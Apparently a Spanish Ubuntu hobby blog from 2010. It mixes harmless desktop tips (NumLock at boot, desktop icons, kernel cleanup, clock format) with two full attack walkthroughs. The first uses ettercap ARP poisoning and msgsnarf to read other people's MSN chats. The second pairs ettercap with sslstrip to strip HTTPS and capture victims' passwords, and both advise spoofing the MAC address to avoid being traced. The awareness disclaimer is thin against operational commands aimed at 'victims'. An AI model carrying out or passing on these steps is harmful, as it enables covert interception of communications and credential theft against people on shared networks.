martes, 30 de noviembre de 2010

Hacer que el teclado numérico se active al encender

 A muchos os revienta cantidad tener que apretar la tecla NumLock porque estaba desactivada y estabais escribiendo alguna cosa y os habéis movido por las opciones sin saber que habéis hecho. grgrgrgrg

Bueno, vamos a calmarnos, que esto tiene una solución.

Para empezar debemos descargarnos un pequeño programa, y añadir ese programa al inicio del sistema para que se ejecute solo.

scorpyo@pc-cito:~$ sudo apt-get install numlockx

Editamos el archivo /etc/gdm/Init/Default

scorpyo@pc-cito:~$ sudo gedit /etc/gdm/Init/Default

Y añadimos lo siguiente, con la "#" y todo para que quede comentado y así sepais que esa linea la añadisteis vosotros:

 ---------------------Copia y pega estas líneas---------------------
# Añadido para que detecte si numlockx está activado, y si no lo está lo hace
if [ -x /usr/bin/numlockx ]; then
  /usr/bin/numlockx on
fi

-----------------------------------------------------------------------

Ahora, cada vez que inicies se activará el bloqueo numérico. :D

Nota: es posible, que en la pantalla de entrada no se ilumine el led del NumLock, pero estará activado y en cuanto iniciéis sesión se iluminará para confirmar que está activo.

Iconos en el escritorio

Mucha gente se siente incomoda con el escritorio de Gnome, a ser muy soso y no tener iconos.


Tambien puede que de coraje, que si entras en un dispositivo se muestre en el escritorio un acceso directo...

Pues ahora, vamos a cambiar ese comportamiento y además, vamos a poner los iconos de acceso en el escritorio.

Abrid una terminal y escribir:

scorpyo@pc-cito:~$ gconf-editor

Se abrirá el editor de Gnome.
Pues ahora tenemos que buscar en la siguiente ruta: apps/nautilus/desktop/

A la derecha se mostrará el conetido, pues tendréis que marcar las casillas para lo que queráis.

computer_icon_visible  ----> Muestra el icono tipo "Mi PC"
home_icon_visible  ---------> Muestra el icono Home (Tu carpeta personal)
networ_icon_visible  --------> Muestra el icono de conexiones de red
trash_icon_visible  ----------> Muestra el icono de la papelera

Cuando termineis solo cerrad la ventana y listo.
Listo.

domingo, 28 de noviembre de 2010

Eliminar kernels antiguos

Muchos de vosotros os habréis percatado de que al iniciar ubuntu os salen nuevas opciones de arranque en el menú del Grub, esto sucede porque tenéis más de un núcleo de sistema (kernel) y se suele mantener para, en caso de tener problemas o incompatibilidad con el nuevo Kernel volver al antiguo Kernel y así solventar el problema asta que se actualice el nuevo.

Suele pasar, que una vez que hemos probado el nuevo kernel, no queramos tener el antiguo.
Pues he aquí la solución para poder borrar esas entradas del Grub, y de paso, ahorrar espacio en el sistema.

Para listar los kernels instalados hacer lo siguiente:

scorpyo@PC-Cito:~$ dpkg --get-selections | grep linux-image
linux-image-2.6.35-22-generic            install
linux-image-2.6.35-23-generic            install
linux-image-generic                install

Importante! Nunca eliminar el paquete linux-image-generic, ya que es necesario para recibir las actualizaciones del Kernel.
 
 Ahora, podemos borrar cualquiera de los antiguos, con:

sudo apt-get purge paquete

Donde paquete es el nombre del paquete a borrar, en mi caso es:
linux-image-2.6.35-22-generic.
Pues yo hago:

scorpyo@PC-Cito:~$ sudo apt-get purge linux-image-2.6.35-22
[sudo] password for scorpyo:
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias      
Leyendo la información de estado... Hecho
Nota, seleccione «linux-image-2.6.35-22-generic» para el registro de expresión «linux-image-2.6.35-22»
Nota, seleccione «linux-image-2.6.35-22-server» para el registro de expresión «linux-image-2.6.35-22»
Nota, seleccione «linux-image-2.6.35-22-virtual» para el registro de expresión «linux-image-2.6.35-22»
Nota, seleccione «linux-image-2.6.35-22-generic-pae» para el registro de expresión «linux-image-2.6.35-22»
El paquete linux-image-2.6.35-22-server no esta instalado, no se eliminará
El paquete linux-image-2.6.35-22-virtual no esta instalado, no se eliminará
Los siguientes paquetes se ELIMINARÁN:
  linux-image-2.6.35-22-generic*
0 actualizados, 0 se instalarán, 1 para eliminar y 1 no actualizados.
Se liberarán 139MB después de esta operación.
¿Desea continuar [S/n]?  s

Respondeis que sí y con eso se eliminará el antiguo kernel.

Lo podéis comprobar con el comando anterior:

scorpyo@PC-Cito:~$ dpkg --get-selections | grep linux-image
linux-image-2.6.35-23-generic            install
linux-image-generic                install

Como veis, ya está eliminado uno de los kernels.

Nota: Es posible que te pida actualizar el paquete antes de borrarlo.

lunes, 22 de noviembre de 2010

Capturar las conversaciones de msn de otros en tu misma red

Hola de nuevo, quiero hacer este tutorial, para que veáis lo vulnerable que podéis llegar a ser cuando usamos un programa de mensajería instantánea como lo es MSN y sus clones para Linux y de más plataformas.

Aviso: Nada de lo que aquí expongo está pensado para que robéis información de terceros, si no para que veáis como se hace y así vosotros mismos lo probéis en vuestra red y os concienciéis para que toméis las medidas de seguridad oportunas.

Muchos de vosotros creéis que por el hecho de tener una clave en el router y un cortafuegos, antivirus y demás herramientas estáis protegidos..., pues, no tiene por que ser así. Tu lo estarás haciendo bien, si , jejeje pero msn tiene un problema, que cuando tu mandas información al darle a "enviar", esta información viaja en "texto plano", es decir, viaja sin más encriptación que la que tenga la red, y si la encripatación de esta es débil... pues ya tenemos un problema preocupante.

Si usas wifi, es relativamente fácil hallar esa información.
Si usas cable es casi el mismo procedimiento solo que limita el acceso.

Imaginemos que alguien consigue entrar en una red mediante BackTrack (ya haré un tutorial de como hacerlo) y una vez dentro, en vez de gorronearnos internet, no se le ocurre otra cosa al prenda que capturar los datos de la red....
¿Es posible eso? la respuesta es Sí.

Veamos, las tarjetas de red suelen mandar información al router y viceversa... esa información viaja por la red con una identificación sobre a que dirección ip esta dedicado el paquete, a que puerto, etc..
Las tarjetas están escuchando toda esa información siempre, solo que ignoran los paquetes que son mandados a otros equipos.
Para evitar eso, se puede poner nuestra tarjeta en modo Promiscuo, con lo cual, ya no ignoraría esos paquetes.
Otra forma es colocar nuestra tarjeta en modo monitor y capturar todos los datos que viajan por la red (incluso sin estar conectados a ella), tanto encriptados como no. Luego, con un programa como por ejemplo wireshark y tcpxtract, separamos los datos y podríamos ver, hasta las fotos, vídeos y demás que hayan circulado por la red en el momento de la captura.

Etc...

Yo solo hago este tutorial para haceros una demostración a modo de que veáis que no es tan difícil que seáis víctimas de estas técnicas y así, fortalezcáis vuestra red con claves tipo wpa2 y encriptación TKIP.

Nosotros usaremos el envenenamiento ARP, más abajo explico lo que es, así que
manos a la obra.

Necesitareis estos programas:

ettercap
dsniff
macchanger

ettercap, hará lo que puede hacer dsniff, que es envenenamiento ARP solo que con ettercap es mas fácil y más intuitivo, y dsniff lo usaremos porque tiene un paquete para escuchar los puertos de MSN.


Para instalarlos:
scorpyo@NASA:~$ sudo apt-get install ettercap dsniff macchanger


Ahora, desactivar el cortafuegos porque lo vamos a volver loco...

Supongamos que ya estais conectados a la red, pues mal hecho
jajaja
Antes de conectaros deberíais cambiar vuestra MAC (un identificador único de cada tarjeta) para que cuando quede registrada en el log del router, esta, no signifique nada y no se os pueda relacionar, aunque supuestamente es tu router ¿no?, yo os aconsejo que cambies la mac para que veáis, lo facilísimo que lo tiene cualquiera para hacerlo.

Para cambiar la mac actual a 00:11:22:33:44:55 en Linux basta con usar macchanger

scorpyo@NASA:~$ sudo ifconfig wlan0 down
scorpyo@NASA:~$ sudo macchanger -m 00:11:22:33:44:55 wlan0
[sudo] password for scorpyo:
Current MAC: 70:f1:12:18:c1:4e (unknown)
Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)
scorpyo@NASA:~$ ifconfig wlan0 up

Donde yo he puesto wlan0 vosotros poner vuestra tarjeta, si no sabeis como las nombra vuestro sistema hacer  un ifconfig

scorpyo@NASA:~$ ifconfig

Bueno, hecho esto, ya podéis conectaros que lo haréis con una mac falsa :P

Nota: si usais el un administrador de red  como NetworkManager, este ignorará el cambio de mac, y usará tu verdadera mac, para evitar eso, hacer click derecho en el icono, le damos a editar las conexiones, elegimos la conexión que vamos a usar y le damos a Editar, y rellenamos el campo que pone Dirección MAC clonada, poniendo la mac que querais para que cuando se conecte a esa red, use esa MAC.

Para comprobar que está usando esa mac, una vez conectado a la red, ponéis en consola el siguiente comando:

scorpyo@pc-cito:~$ ifconfig wlan0

wlan0     Link encap:Ethernet  direcciónHW 10:1f:a1:6c:36:3a
          Direc. inet:83.230.169.140  Difus.:83.230.169.255  Másc:255.255.255.128
          Dirección inet6: fe80::72f1:a1ff:fe16:be3e/64 Alcance:Enlace
          ACTIVO DIFUSIÓN FUNCIONANDO MULTICAST  MTU:1500  Métrica:1
          Paquetes RX:622339 errores:0 perdidos:0 overruns:0 frame:0
          Paquetes TX:314387 errores:0 perdidos:0 overruns:0 carrier:0
          colisiones:0 long.colaTX:1000
          Bytes RX:905556051 (905.5 MB)  TX bytes:15754742 (15.7 MB)
          Interrupción:17 Memoria:ffffc90011098000-ffffc90011098100


Bien...

Ahora, una vez dentro en la red, abrimos una terminal y ejecutamos:

scorpyo@NASA:~$ sudo ettercap -C -i wlan0

Donde wlan0 es el nombre de la tarjeta con la que os conectáis.

Os abrirá un programa llamado ettercap, usaremos este programa para esnifar la red y para envenenar las tablas ARP de toda la peña que está en la red.

Digamos, que el envenenamiento ARP consiste en decirle al router que yo soy fulano, y a fulano, que yo soy el router, entonces, con eso conseguimos que toda la información que se manden entre ellos pase primero por nosotros, pudiendo así ver la información, manipularla etc... y luego la redirigimos al que le pertenece, y fulano, solo notará un pequeño retraso, (el tiempo en el que la URL que solicitó estuvo en nuestro equipo hasta que se le devolvió).

Nos centraremos solo en escuchar.

Bien, ahora hay que hacer lo siguiente:

Ahora que está abierto ettercap vamos a “Sniff” y elegimos “Unified sniffing... U”

Aquí, debería de salir nuestra tarjeta ya introducida, en mi caso, wlan0 pero si no es correcta porque nos equivocamos al escribirlo, se puede cambiar directamente escribiendo y dándole al enter.


Ahora, lo que haremos es escanear los host, le damos a “Host” y a “Scan for hots” o lo que es lo mismo (Ctrl+s), una vez hecho, volvemos a darle a “Host” y a “Host list” o (h) para ver la lista.

Llegado este punto, tenemos dos opciones, atacar toda la red, o solo a un equipo, si lo que queremos es atacar toda la red nos saltaremos este paso:

Primero selecciono el Host víctima y apretamos el número 1 de nuestro teclado, y luego el Router y apretamos el 2 y quedaría algo así:

Target1: Equipo1
Target2: Router

Nota: Normalmente el router es el que tiene una ip más baja, una muy común es la 192.168.1.1 o 192.168.0.1

Ahora, lo que haremos será ponerlo a Snifar dandole a “Start” y a “Start sniffing” y luego hacemos el ataque ARP Poison (Envenenamiento ARP) pinchamos en “Mitm” y a “ARP pisoning...” en la ventana que nos sale ponemos "remote" sin las comillas y le damos al enter


Bien, ya hemos envenenado todos los equipos seleccionados... ahora queda saber si están corriendo msn ¿no?

Eso es fácil de saber, puesto que msn usa el puerto 1864 y 1863 para comunicarse.
Solo tendremos que buscar ese puerto para saber si alguien está hablando por msn.

Para ver las conexiones que hay en el momento, aprieta Shif+c o ve a View, connections.

Se abrirá las conexiones activas, con información de cuantos datos se están emitiendo, para que equipo, desde cual equipo y hacia que puerto.
Buscar el puerto 1864 o 1863, si los hay o no los hay. Estais de suerte... hay una cotorra en la red.

Para capturar y mostrar en pantalla quien habla y lo que dice abriremos una nueva terminal y escribiremos lo siguiente:

scorpyo@NASA:~$ sudo msgsnarf -i wlan0 

Y listo, os aconsejo que pongáis la ventana a tamaño completo y veréis mejor las conversaciones... (no abuséis, solo es para probar en vuestra red)
Bien, pues eso es todo, solo un concejo, para terminar la escucha de msgsnarf
apretar Ctrl+c y para parar a ettercap primero pinchamos en “Mitm” luego en "Stop mitm attacks(s)" si no hacéis eso al cerrar el programa las víctimas perderán la conexión a internet puesto que TÚ eras su router hasta hacía unos segundos ¿recuerdas? jejeje pues eso.

Un saludo a todos.


Cambiar la estética del reloj de ubuntu 10.04 y 10.10

Hola, en esta entrada explicaré de manera muy rápida, como configurar el reloj para que se muestre de una manera más graciosa y vistosa.

Para conseguir eso, necesitamos que el panel tenga al menos 34 pixeles de alto, para ello haremos lo siguiente:

Botón derecho en el panel, propiedades, y le damos por lo menos un valor de 34 pixeles de tamaño (alto).

Bien, ahora podemos aplicar el cambio de la siguiente manera.

Abrimos una terminal y ejecutamos lo siguiente:

scorpyo@NASA:~$ gconf-editor

Se abrirá una ventana que se encarga de la configuración de muchos programas, estilo Editor de registros de window$.

Click en la imagen para agrandar


Bien, ahora debemos de ir a la siguiente ruta:

apps/panel/applets/applet_2/prefs/

Click en la imagen para agrandar

bien, ahora en la ventana de la derecha, podremos ver las distintas configuraciones del panel, pues hacemos click en el apartado VALOR de la cadena "Custon_Format" y le damos el valor siguiente:
<span size="smaller" color="#27369E">%a-%d-%b%n<b>%H:%M</b></span>

y ahora cambiamos tambien el valor de "Format" y le ponemos:
custom

y.... tachán! jejeje reloj cambiado, si quieres volverlo a poner como estaba, tan solo cambia de nuevo el valor de la cadena "Format" a:
24-hour

Para que veas como queda es como la de la imagen:


Si queréis un color distinto, no hay problema, elegir el color de la siguiente tabla:


Cuando tengáis elegido el color solo tenéis que apuntar el codigo de color y cambiar el valor del color:
 
...color="#27369E"....

Y poner la numeración que habéis elegido, ejemplo:

...color="#FF0000"... para rojo intenso.

¡Que lo disfrutéis!

viernes, 19 de noviembre de 2010

Como extraer correctamente información de un cliente conectado a un router Usando UBUNTU


Este tutorial se concentrará en la suplantación de paginas web seguras para convertirlas en no seguras, es decir pasar de "https" a "http"

Al contrario que muchos internautas, yo soy de los que opinan que las paginas SSL son seguras,(de momento) el problema no es la encriptación, si no la poca atención por parte de los usuarios de preocuparse de ver si la página en la que están escribiendo o introduciendo datos es segura o no.

Todo el tutorial esta rodado en una maquina con linux. En concreto la distro de Ubuntu 10.04

Los programas que usaremos son ettercap y sslstrip:

¿Que por qué no usar solo ettercap si ya este tiene su propio Plugin para manipular paginas web https y pasárselas al cliente?

Pues muy sencillo porque normalmente los navegadores como mozilla montan un circo para avisar al usuario de que la pagina que visitan no es totalmente segura, que si que si, que tiene su certificado en regla y sin caducar, que es conocido peeeeeeero, no se está totalmente seguro de su procedencia.
En este caso es el usuario el que debe elegir si aceptar el certificado sospechoso y morder el anzuelo, o no hacerlo.

La verdad, si usa mozilla, dudo que lo haga, si usa explorer.... tal vez, porque el aviso de explorer no es tan impactante y parece mas bien una más de sus
ventanas de aviso como las de (¡cuando manda información a Internet esta podría ser vista por otras personas!)

Por todo eso utilizaremos sslstrip, que básicamente lo que hace es escuchar un puerto por el que se comunica un cliente al que se le este haciendo un ataque ARP Poison y controlar su tráfico, cuando encuentra una web en https la intercepta, la cambia a http y la devuelve al cliente. De esta manera, el cliente tras solicitar acceso a una web segura, lo que obtendrá es una web no segura, eso sí, con su candadito para que parezca que sí lo es.

Bueno, vamos al lío:

Sslstrip está escrito en Python y es necesario tenerlo instalado en la máquina en la que se ejecute para que pueda funcionar, así que si tu distro no lo posée ya instalado, te lo puedes instalar mediante repositorios.

Código:

scorpyo@PCito:~$ sudo apt-get install python


Para instalar sslstrip creo que no aparece en los repositorios, así que googlea y descargarlo.

Descomprimirlo y hacer un "cd" a la carpeta donde esté descomprimido.

Código:

scorpyo@PCito:~$ tar zxvf sslstrip-0.7.tar.gz
scorpyo@PCito:~$ cd sslstrip-0.7

Este programa se puede correr sin istalarlo pero recomiendo su instalacion porque es mucho mas sencillo de tipear, y ademas si no lo instalas tienes que estar en la misma carpeta donde se encuentra para ejecutarlo.

Para instalarlo usar la manera siguiente:

scorpyo@PCito:~$ sudo python setup.py install

De esta manera no habrá que abrirlo con el comando python nunca más.

De acuerdo, ya que tenemos listo nuestro sslstrip vamos con ettercap...

Primero descargaremos ettercap y lo instalaremos, dicen que si lo haces mediante repositorios no se instalan todos los plugins pero la verdad, yo lo hice mediante repositorios y me funcionó:

Código:

scorpyo@PCito:~$ sudo apt-get install ettercap

Ahora viene una parte que yo me he inventado para hacer menos problemático el uso de estos dos programas a la vez.

Puesto que sslstrip usa iptables y hay que configurarlas antes de lanzar el ataque pues lo que hacemos es modificar el etter.conf para que haga ese trabajo por nosotros ;)

Para que ettercap trabaje conjuntamente con sslstrip hacer lo siguiente:

Modificar el archivo etter.conf que se encuentra en /etc/etter.conf, hacedlo así y como root:

Código:

scorpyo@PCito:~$ sudo gedit /etc/etter.conf

Modificar y volver a comentar las lineas (si estan descomentadas) de iptable y ahora crear una nueva para redirecconar al puerto por defecto de sslstrip, para que lo veáis mejor y lo comprendáis pondré el fragmento del archivo que queda modificado:

Nota: Una linea comentada es la que tiene el símbolo "#" al principio. Si está comenteada (tiene almoadilla al principio) el sistema la ignora.
Original:

#---------------
# Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"




Modificado:

#---------------
# Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

# Si usas modificacion de iptables para sslstrip descomenta esta linea:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --destination-port 80 -j REDIRECT --to-port 10000"




la linea ya viene descomentada, así que solo pegarla y listo.

Bien, ahora que ya tienes ettercap listo vamos a preparar nuestra tarjeta. Para los que no tienen aplicación para conectarse a una red de forma gráfica que no se preocupen, pongo todo el código que hay que escribir para conectarse a un AP (Punto de Acceso):

Nota: Donde yo he puesto “wlan0” vosotros poner la tarjeta que esteis usando, ejemplo eth0 o wlan1....


Entrar como root:

Nota: Con este comando ya no tendrás que ponerte en modo root más a no ser que cierres la ventana ;)

scorpyo@PCcito:~$ sudo -s


Desactivo la tarjeta que voy a usar para cambiarle la MAC y ponerla en modo Promiscuo:

root@PCcito:~# ifconfig wlan0 down

root@PCcito:~# macchanger -m 00:11:22:33:44:55 wlan0

Current MAC: 00:12:34:56:78:90 (unknown)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)

root@PCcito:~# ifconfig wlan0 promisc

root@PCcito:~# ifconfig wlan0

wlan0 Link encap:Ethernet direcciónHW 00:11:22:33:44:55
DIFUSIÓN SINAVANCES PROMISCUO ALLMULTI MTU:1500 Métrica:1
Paquetes RX:0 errores:0 perdidos:0 overruns:0 frame:0
Paquetes TX:0 errores:0 perdidos:0 overruns:0 carrier:0
colisiones:0 long.colaTX:1000
Bytes RX:0 (0 KB) TX bytes: (0 KB)
Interrupción:17 Memoria:f83d8000-f83d8100

root@PCcito:~# ifconfig wlan0 up

Ahora busco donde conectarme mediante consola (el que tenga modo gráfico que lo haga como quiera):

root@PCcito:~# iwlist wlan0 scanning

Y ahora me conecto por ejemplo con el ESSID Router1 con la clave hexadecimal 25:d2:45:89:74 (Evidentemente la clave de la red a la que te conectes tienes que saberla... jejeje)

root@PCcito:~# iwconfig wlan0 essid Router1

root@PCcito:~# iwconfig wlan0 key 25:d2:45:89:74

Nota: si la clave es en texto normal pues tendras que poner "s:" despues del comando key sería así: (root@PCcito:~# iwconfig wlan0 key s:25:d2:45:89:74)

Si es necesario se rellena el campo AP (Access Point) si no se hizo automáticamente, lo hacemos así:

root@PCcito:~# iwconfig wlan0 ap 00:02:51:24:46:e4

Listo, ahora que tenemos rellenos todo los datos correctamente solicitamos la conexión así para que se nos asigne una ip y una puerta de enlace:

root@PCcito:~# dhcpclient wlan0

Si todo ha salido bién, pondrá que la conexión está hecha y que es válida durante xxxxxxx segundos

Bién, ya puedo abrir el ettercap en modo Curse:

root@PCcito:~# ettercap -C -i wlan0

Ahora que está abierto vamos a “Sniff” y elegimos “Unified sniffing... U”

Aquí, debería de salir nuestra tarjeta ya introducida, pero si no es correcta porque nos equivocamos en el comando se puede cambiar directamente escribiendo y dandole al enter.



Ahora, lo que haremos es escanear los host, le damos a “Host” y a “Scan for hots” una vez hecho, volvemos a darle a “Host” y a “Host list” para ver la lista.

Llegado este punto, tenemos dos opciones, atacar toda la red, o solo a un equipo, si lo que queremos es atacar toda la red nos saltaremos este paso:

Primero selecciono el Host victima y apretamos el número 1 de nuestro teclado, y luego el Router y apretamos el 2 y quedaría algo así:

Target1: Equipo1
Target2: Router

Nota: Normalmente el router es el que tiene una ip más baja, una muy común es la 192.168.1.1 o 192.168.0.1

Ahora, lo que haremos será ponerlo a Snifar dandole a “Start” y a “Start sniffing” y luego hacemos el ataque ARP Poison (Envenenamiento ARP) pinchamos en “Mitm” y a “ARP pisoning...” en la ventana que nos sale ponemos "remote" sin las comillas y le damos al enter

Ahora correremos sslstrip:

Abrir una terminal nueva, para los que lo tienen instalado tan solo escribir en modo root:

root@PCcito:~# sslstrip -w captura-ssl -s -k -f &
root@PCcito:~# tail -f captura-ssl


Para los que no lo instalaron deberán de ir a la carpeta donde se descomprimió y escribir:

root@PCcito:~# python sslstrip-py -w captura-ssl -s -k -f &
root@PCcito:~# tail -f captura-ssl

Listo!

Ya están los dos programas trabajando conjuntamente.

Por alguna extraña razón, a mi no me aparecen en la ventana de ettercap las contraseñas y usuarios que se introducen en las paginas modificadas por sslstrip así que yo, por lo menos dependo de ejecutar el comando "tail -f captura-sslstrip" para ver el archivo en tiempo real y esperar a ver que entre texto.

Si puedes ver las contraseñas en ettercap, omite el ultimo comando para no tener que buscar el nombre y la contraseña entre tanto texto. ;) eso es todo.

PD: Solo un concejo, para terminar la escucha de sslstrip apretar Ctrl+c y para parar a ettercap primero pinchamos en “Mitm” luego en "Stop mitm attacks(s)" si no hacéis eso al cerrar el programa las víctimas perderán la conexión a internet puesto que TÚ eres su router mientras este activo el ataque mitm, jejeje pues eso.

Espero que os sirva.

Mis agradecimientos a la web http://www.lapipaplena.com donde me ayudaron a iniciarme con todo esto y en especial a Pep al que no he parado de contar mis avances.

jueves, 18 de noviembre de 2010

Mi primer blog

Hola este es mi primer blog, y no se, espero que sepa sacarle utilidad y que la gente que lo visite no se corte a la hora de comentar en él.

Espero ser útil a los visitantes.